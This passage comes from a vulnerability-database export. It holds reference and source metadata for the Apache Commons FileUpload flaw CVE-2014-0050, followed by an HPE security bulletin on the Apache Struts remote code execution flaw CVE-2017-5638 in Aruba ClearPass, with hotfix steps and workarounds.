          {
            "trust": 0.3,
            "url": "http://www.hpe.com/support/security_bulletin_archive"
          },
          {
            "trust": 0.3,
            "url": "http://www.hpe.com/support/subscriber_choice"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
          },
          {
            "trust": 0.3,
            "url": "https://www.hpe.com/info/report-security-vulnerability"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4322"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0099"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0119"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/en/support/security/"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0096"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0075"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/en/support/security/advisories/"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4590"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6429"
          },
          {
            "trust": 0.2,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4322.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0033"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4877"
          },
          {
            "trust": 0.2,
            "url": "https://h20392.www2.hpe.com/portal/swdepot/displayproductinfo.do?productnumb"
          },
          {
            "trust": 0.2,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.2,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.2,
            "url": "https://twitter.com/vmwaresrc"
          },
          {
            "trust": 0.2,
            "url": "https://www.vmware.com/support/policies/lifecycle.html"
          },
          {
            "trust": 0.2,
            "url": "http://kb.vmware.com/kb/1055"
          },
          {
            "trust": 0.2,
            "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
          },
          {
            "trust": 0.2,
            "url": "https://www.vmware.com/support/policies/security_response.html"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/security/advisories"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2071"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2067"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/264.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/shiverino/npe2223"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/jrrdev/cve-2014-0050"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/31615/"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=32760"
          },
          {
            "trust": 0.1,
            "url": "https://usn.ubuntu.com/2130-1/"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=brms\u0026downloadtype=securitypatches\u0026version=6.0.1"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=bpm.suite\u0026downloadtype=securitypatches\u0026version=6.0.1"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0075"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0227"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0119"
          },
          {
            "trust": 0.1,
            "url": "http://advisories.mageia.org/mgasa-2014-0149.html"
          },
          {
            "trust": 0.1,
            "url": "http://advisories.mageia.org/mgasa-2014-0268.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0099"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0096"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0227"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-1904.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/site/documentation/en-us/red_hat_jboss_fuse/"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-6430.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4517.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4517"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2172"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-6429.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2192"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6430"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1904"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4152"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2035"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4152.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-2172.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse\u0026downloadtype=distributions\u0026version=6.1.0"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0054.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0085.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0085"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-2035.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-2192.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0054"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/team/key/#package"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/knowledge/articles/11258"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0033.html"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05356363\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5540"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5134"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4345"
          },
          {
            "trust": 0.1,
            "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5553"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5132"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5556"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05356388\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5545"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5131"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5129"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5539"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5555"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5133"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5546"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5544"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5127"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5552"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5547"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5548"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5549"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5028"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5130"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5541"
          },
          {
            "trust": 0.1,
            "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05376917\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05390722"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5125"
          },
          {
            "trust": 0.1,
            "url": "http://advisories.mageia.org/mgasa-2014-0109.html"
          },
          {
            "trust": 0.1,
            "url": "http://svn.apache.org/r1565163"
          },
          {
            "trust": 0.1,
            "url": "http://svn.apache.org/r1565169"
          },
          {
            "trust": 0.1,
            "url": "http://www.enigmail.net/"
          },
          {
            "trust": 0.1,
            "url": "http://markmail.org/message/kpfl7ax4el2owb3o"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.0.1"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0094"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0112"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/2081470"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0112"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0094"
          },
          {
            "trust": 0.1,
            "url": "https://www.vmware.com/go/download-vcops"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6420"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0002"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-7285.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0003"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.mq.enterprise\u0026downloadtype=securitypatches\u0026version=7.1.0"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0002.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7285"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise\u0026downloadtype=securitypatches\u0026version=7.1.0"
          },
          {
            "trust": 0.1,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0452.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-6440.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0003.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/updates/classification/#important"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6440"
          },
          {
            "trust": 0.1,
            "url": "https://softwaresupport.hpe.com\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3253"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0107"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5652"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0242"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1914"
          },
          {
            "trust": 0.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0242"
          },
          {
            "trust": 0.1,
            "url": "https://www.vmware.com/patchmgr/findpatch.portal"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1914"
          },
          {
            "trust": 0.1,
            "url": "https://www.vmware.com/go/download-vsphere"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5885"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0033"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-201412-29.xml"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3546"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3546"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5887"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4431"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0050"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5887"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5886"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2733"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4286"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0119"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0075"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3544"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2071"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0099"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2067"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4322"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5886"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4590"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-2733"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0096"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3544"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4534"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5885"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4431"
          },
          {
            "trust": 0.1,
            "url": "https://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4534"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "131089"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "125687"
          },
          {
            "db": "PACKETSTORM",
            "id": "125109"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          },
          {
            "db": "PACKETSTORM",
            "id": "125119"
          },
          {
            "db": "PACKETSTORM",
            "id": "127215"
          },
          {
            "db": "PACKETSTORM",
            "id": "140605"
          },
          {
            "db": "PACKETSTORM",
            "id": "126052"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          },
          {
            "db": "PACKETSTORM",
            "id": "139721"
          },
          {
            "db": "PACKETSTORM",
            "id": "128211"
          },
          {
            "db": "PACKETSTORM",
            "id": "129553"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "ident": null
          },
          {
            "db": "BID",
            "id": "65400",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126007",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "131089",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126144",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126746",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "141092",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "125687",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "125109",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126754",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "125119",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "127215",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "140605",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126052",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126404",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "139721",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "128211",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "129553",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2014-04-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "ident": null
          },
          {
            "date": "2014-02-06T00:00:00",
            "db": "BID",
            "id": "65400",
            "ident": null
          },
          {
            "date": "2014-04-03T14:56:00",
            "db": "PACKETSTORM",
            "id": "126007",
            "ident": null
          },
          {
            "date": "2015-03-30T21:20:12",
            "db": "PACKETSTORM",
            "id": "131089",
            "ident": null
          },
          {
            "date": "2014-04-14T22:28:46",
            "db": "PACKETSTORM",
            "id": "126144",
            "ident": null
          },
          {
            "date": "2014-05-22T01:43:07",
            "db": "PACKETSTORM",
            "id": "126746",
            "ident": null
          },
          {
            "date": "2017-02-15T00:39:05",
            "db": "PACKETSTORM",
            "id": "141092",
            "ident": null
          },
          {
            "date": "2014-03-13T21:19:37",
            "db": "PACKETSTORM",
            "id": "125687",
            "ident": null
          },
          {
            "date": "2014-02-07T04:32:05",
            "db": "PACKETSTORM",
            "id": "125109",
            "ident": null
          },
          {
            "date": "2014-05-22T01:44:32",
            "db": "PACKETSTORM",
            "id": "126754",
            "ident": null
          },
          {
            "date": "2014-02-10T23:22:06",
            "db": "PACKETSTORM",
            "id": "125119",
            "ident": null
          },
          {
            "date": "2014-06-25T21:34:12",
            "db": "PACKETSTORM",
            "id": "127215",
            "ident": null
          },
          {
            "date": "2017-01-19T13:56:50",
            "db": "PACKETSTORM",
            "id": "140605",
            "ident": null
          },
          {
            "date": "2014-04-08T21:21:55",
            "db": "PACKETSTORM",
            "id": "126052",
            "ident": null
          },
          {
            "date": "2014-05-01T02:11:10",
            "db": "PACKETSTORM",
            "id": "126404",
            "ident": null
          },
          {
            "date": "2016-11-15T00:42:48",
            "db": "PACKETSTORM",
            "id": "139721",
            "ident": null
          },
          {
            "date": "2014-09-11T21:08:01",
            "db": "PACKETSTORM",
            "id": "128211",
            "ident": null
          },
          {
            "date": "2014-12-15T20:00:49",
            "db": "PACKETSTORM",
            "id": "129553",
            "ident": null
          },
          {
            "date": "2014-04-01T06:27:51.373000",
            "db": "NVD",
            "id": "CVE-2014-0050",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "ident": null
          },
          {
            "date": "2018-07-12T06:00:00",
            "db": "BID",
            "id": "65400",
            "ident": null
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-0050",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          }
        ],
        "trust": 0.4
      },
      "title": {
        "_id": null,
        "data": "Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability",
        "sources": [
          {
            "db": "BID",
            "id": "65400"
          }
        ],
        "trust": 0.3
      },
      "type": {
        "_id": null,
        "data": "Failure to Handle Exceptional Conditions",
        "sources": [
          {
            "db": "BID",
            "id": "65400"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-201703-0755

    Vulnerability from variot - Updated: 2025-11-18 15:18

    The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. Apache Struts2 Contains a vulnerability that allows the execution of arbitrary code. Apache Struts2 In Jakarta Multipart parser A vulnerability exists in the execution of arbitrary code that could allow the execution of arbitrary code. The attack code for this vulnerability has been released.By processing a request crafted by a remote third party, arbitrary code could be executed with the privileges of the application. Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

    Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03723en_us

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: hpesbhf03723en_us Version: 1

    HPESBHF03723 rev.1 - HPE Aruba ClearPass Policy Manager, using Apache Struts, Remote Code Execution

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2017-03-29 Last Updated: 2017-03-29

    Potential Security Impact: Remote: Code Execution

    Source: Hewlett Packard Enterprise, Product Security Response Team

    VULNERABILITY SUMMARY A potential security vulnerability has been identified in HPE Aruba ClearPass Policy Manager.

    Note: The ClearPass Policy Manager administrative Web interface is affected by the vulnerability. ClearPass Guest, Insight, and Graphite are NOT impacted.

    • Aruba ClearPass Policy Manager All versions prior to 6.6.5

    BACKGROUND

    CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2017-5638
      9.4 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
      9.7 (AV:N/AC:L/Au:N/C:C/I:C/A:P)
    
    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:
    

    https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

    RESOLUTION

    HPE Aruba has provided hotfixes for ClearPass 6.6.5, 6.6.4, and 6.5.7. Use one of the following methods to install the appropriate hotfix:

    Install the Hotfix Online Using the Software Updates Portal:

    1. Open ClearPass Policy Manager and go to Administration - Agents and Software Updates - Software Updates.

    2. In the Firmware and Patch Updates area, find the "ClearPass 6.5.7 Hotfix Patch for CVE-2017-5638" or "ClearPass 6.6.4 Hotfix Patch for CVE-2017-5638" patch and click the Download button in its row.

    3. Click Install.

    4. When the installation is complete and the status is shown as "Needs Restart", proceed to restart ClearPass. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change.

    Installing the hotfix Offline Using the Patch File from support.arubanetworks.com:

    1. Download the "ClearPass 6.5.7 Hotfix Patch for CVE-2017-5638" or "ClearPass 6.6.4 Hotfix Patch for CVE-2017-5638" patch from the Support site.

    2. Open the ClearPass Policy Manager Admin UI and go to Administration - Agents and Software Updates - Software Updates.

    3. At the bottom of the Firmware and Patch Updates area, click Import Updates and browse to the downloaded patch file. The name and description once imported may differ from the name and remark on the support site as these were adjusted after posting. This is purely a cosmetic discrepancy.

    4. Click Install.

    5. When the installation is complete and the status is shown as Needs Restart, proceed to restart ClearPass. After reboot, the status for the patch will be shown as Installed. The ClearPass Policy Manager version number will not change.

    Workarounds


    Restrict access to the Policy Manager Admin Web Interface. This can be accomplished by navigating to Administration - Server Manager - Server Configuration - Server-Name - Network - Restrict Access and only allowing non-public or network management networks.

    Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

    HISTORY Version:1 (rev.1) - 29 March 2017 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

    Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

    Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

    Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

    Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

    Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

    3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

    Copyright 2016 Hewlett Packard Enterprise

    Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

